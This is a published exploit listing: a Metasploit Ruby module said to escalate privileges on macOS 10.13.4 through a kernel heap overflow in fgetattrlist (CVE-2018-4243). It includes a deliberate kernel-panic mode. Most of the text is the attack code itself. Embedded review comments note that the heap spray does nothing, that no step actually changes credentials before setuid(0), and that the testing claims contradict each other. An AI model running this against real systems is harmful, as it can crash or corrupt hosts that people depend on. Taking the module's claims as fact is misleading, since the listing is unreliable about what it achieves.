# =============================================================================================================================================
# | # Title : macOS 10.13.4 (17E199) Heap Overflow Via fgetattrlist – Local Privilege Escalation (XNU kernel) |
# | # Author : indoushka |
# | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
# | # Vendor : https://apple.com/ |
# =============================================================================================================================================
#
# [+] References : https://packetstorm.news/files/id/212496/ & CVE-2018-4243
#
# [+] Summary :
# A kernel heap overflow exists inside the macOS implementation of fgetattrlist.
# The vulnerability occurs due to incorrect handling of user-controlled buffer sizes.
# Specifically:
#   The kernel allocates internal structures using ulmin(bufferSize, fixedsize + varsize)
#   Later, data beyond bufferSize is written into user memory
#   There is no lower bound safety check if bufferSize is smaller than the kernel's expected size
#
# Author
#   Original PoC & Research: Indoushka
#   MSF Ruby Port & Reporting: Indoushka
#   Previous reference: Ian Beer (Project Zero, 2016)
#
# Release Date : 2018‑06‑05
# Severity High / Kernel-Level / Local Privilege Escalation
# Affected Systems
#   macOS 10.13.4 (17E199) confirmed vulnerable
#   Earlier versions suspected vulnerable
#   64-bit kernel heap architectures
#
#   msfconsole
#   use exploit/osx/local/cve_2018_4243
#   set MODE 1
#   run
#
# NOTE(review): the "Tested on" line above names a Windows 11 host and a
# Firefox build. Nothing in this listing shows the module being run on the
# macOS build it names, so the "confirmed vulnerable" claim is not verified
# by this page; the libc calls below only do anything on a macOS session.
#
# [+] POC :
##
# macOS CVE-2018-4243 Local Privilege Escalation & Kernel Panic
#
# Metasploit local exploit module. Flow (see #exploit): open "/", call the
# no-op #heap_spray, issue one undersized fgetattrlist request via
# #overflow_trigger, then either try setuid(0) (MODE 1) or issue a second
# undersized request meant to crash the kernel (MODE 2).
#
require 'msf/core'
require 'ffi' # the ffi gem (bundled with Metasploit); not part of Ruby's stdlib

class MetasploitModule < Msf::Exploit::Local
  # NOTE(review): ExcellentRanking is asserted even though both modes send a
  # request that (per the Summary) can corrupt kernel memory, and the LPE
  # path contains no step that alters process credentials before setuid(0).
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Unix

  # Module metadata and the single MODE option.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'macOS CVE-2018-4243 LPE via fgetattrlist Heap Overflow',
      'Description'    => %q{
        Local privilege escalation exploit by triggering kernel heap overwrite
        during volume attribute serialization. Includes heap spray, FD grooming,
        overflow, and panic fallback.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Original C PoC: Indoushka',
        'Ruby MSF Port: Indoushka'
      ],
      'Platform'       => ['osx'],
      'Arch'           => ARCH_X64,
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['macOS >=10.13', {}]],
      'DisclosureDate' => '2018-06-05'
    ))

    # MODE 1 = try setuid(0) after the overflow request; MODE 2 = deliberately
    # crash the kernel. Both modes issue the undersized fgetattrlist call
    # first (see #exploit), so neither is a non-destructive check.
    register_options(
      [
        OptInt.new('MODE', [true, '1=LPE attempt, 2=Kernel panic PoC', 1])
      ]
    )
  end

  #
  # ---------- Ruby FFI syscalls ----------
  #
  # Thin libc bindings used by the module. Each is a raw C wrapper: failures
  # come back as -1 (with errno set) and are never raised as Ruby exceptions,
  # so every caller has to check the return value itself.
  #
  module MacOS
    extend FFI::Library
    ffi_lib FFI::Library::LIBC

    # Ruby view of the attrlist argument passed to fgetattrlist: seven
    # consecutive uint32 fields (28 bytes as laid out here).
    # NOTE(review): confirm field order and widths against `struct attrlist`
    # in <sys/attr.h>; if they differ, the kernel parses a different request
    # than these field names suggest, and the module's behaviour is not what
    # the advisory describes.
    class AttrList < FFI::Struct
      layout :bitmapcount, :uint32,
             :reserved,    :uint32,
             :volattr,     :uint32,
             :dirattr,     :uint32,
             :fileattr,    :uint32,
             :forkattr,    :uint32,
             :commonattr,  :uint32
    end

    # open(path, flags) -> fd or -1
    attach_function :open, [:string, :int], :int
    # close(fd) -> 0 or -1
    attach_function :close, [:int], :int
    # fgetattrlist(fd, attrlist, buf, bufsize, options) -> 0 or -1
    attach_function :fgetattrlist, [:int, :pointer, :pointer, :ulong, :ulong], :int
    # setuid(uid) -> 0 or -1
    attach_function :setuid, [:uint32], :int
    # getuid() -> current real uid
    attach_function :getuid, [], :int
    # system(command) runs the command via the shell and blocks until it exits
    attach_function :system, [:string], :int
  end

  #
  # Heap spray placeholder
  #
  # Prints a status line and returns. No allocations are made, so the heap
  # spray and FD grooming promised in the module Description are not
  # implemented in this port.
  #
  def heap_spray
    print_status("[*] Starting heap spray (symbolic in ruby)")
    # Demonstration only: no spray is performed.
  end

  #
  # Overflow trigger using small controlled buffer
  #
  # Issues one fgetattrlist request on +fd+ with a 16-byte destination buffer
  # (pre-filled with 0xaa bytes) and the attribute bits set below; 16 is
  # passed as bufferSize and 0 as options. This is the undersized-buffer call
  # the Summary describes; on an unpatched kernel it may corrupt kernel
  # memory, so even MODE 1 is unsafe to run on a host anyone depends on.
  #
  # @param fd [Integer] open descriptor for "/" obtained in #exploit
  # @return [void] the libc return value is only printed; a -1 is still
  #   reported as "Overflow triggered"
  #
  def overflow_trigger(fd)
    al = MacOS::AttrList.new
    al[:bitmapcount] = 5
    al[:volattr] = 0xfff
    al[:commonattr] = 0x20000

    buf = FFI::MemoryPointer.new(:char, 16)
    buf.write_bytes("\xaa" * 16)

    res = MacOS.fgetattrlist(fd, al, buf, 16, 0)
    # Not checked: success and failure are logged identically.
    print_status("[+] Overflow triggered, return=#{res}")
  end

  #
  # Local Privilege Escalation attempt
  #
  # Calls setuid(0) and then getuid() through libc. Nothing earlier in the
  # module touches process credentials -- #overflow_trigger only submits a
  # request with a fixed 0xaa-filled user buffer -- so whether setuid(0)
  # succeeds depends entirely on the kernel's existing state; for an ordinary
  # unprivileged process it fails and the current uid is reported.
  #
  # On success it runs libc system("/bin/bash"), which blocks the module until
  # that interactive shell exits instead of handing a session back to the
  # framework.
  #
  # @return [Boolean] true only when both setuid(0) == 0 and getuid() == 0
  #
  def attempt_root
    print_status("[*] Attempting setuid(0)")

    if MacOS.setuid(0) == 0 && MacOS.getuid() == 0
      print_good("[+] Root obtained!")
      MacOS.system("/bin/bash")
      return true
    end

    print_error("[-] Still user uid=#{MacOS.getuid()}")
    return false
  end

  #
  # Kernel panic fallback mode
  #
  # Repeats the undersized fgetattrlist request with a 4-byte buffer and only
  # commonattr set, on a second descriptor for "/". As its name and message
  # say, the intent is to crash the machine: this is a denial-of-service
  # action against whatever host the session runs on, not a test.
  #
  # NOTE(review): unlike #exploit, the open() result is not checked here; on
  # failure fd is -1 and both fgetattrlist and close are still called with it.
  #
  def panic_fallback
    print_warning("[!] Triggering fallback kernel panic")
    fd = MacOS.open("/", 0)

    al = MacOS::AttrList.new
    al[:bitmapcount] = 5
    al[:commonattr] = 0x20000

    buf = FFI::MemoryPointer.new(:char, 4)
    MacOS.fgetattrlist(fd, al, buf, 4, 0)
    MacOS.close(fd)
  end

  #
  # ---------------- Main Exploit Logic ----------------
  #
  # Entry point invoked by the framework.
  # 1. Opens "/" (flags 0) and aborts if that fails.
  # 2. Runs #heap_spray (no-op) and #overflow_trigger unconditionally, i.e.
  #    the undersized request is issued in BOTH modes.
  # 3. MODE 1 -> #attempt_root; MODE 2 -> #panic_fallback. Any other MODE
  #    value falls through the case silently (there is no else branch) and
  #    only the overflow request from step 2 is made.
  # 4. Closes the descriptor and logs completion.
  #
  def exploit
    print_status("[*] macOS CVE-2018-4243 Exploit (Ruby MSF)")

    mode = datastore['MODE'].to_i

    fd = MacOS.open("/", 0)
    if fd < 0
      print_error("Failed to open /")
      return
    end

    heap_spray
    overflow_trigger(fd)

    case mode
    when 1
      print_status("[*] LPE Attempt mode")
      if attempt_root
        print_good("[+] Exploit Complete with root shell")
      else
        print_error("[-] Exploit failed to gain root")
      end
    when 2
      print_status("[*] Panic mode")
      panic_fallback
    end

    MacOS.close(fd)
    print_status("[*] Module finished")
  end
end

# Greetings to :=====================================================================================
# jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
# ===================================================================================================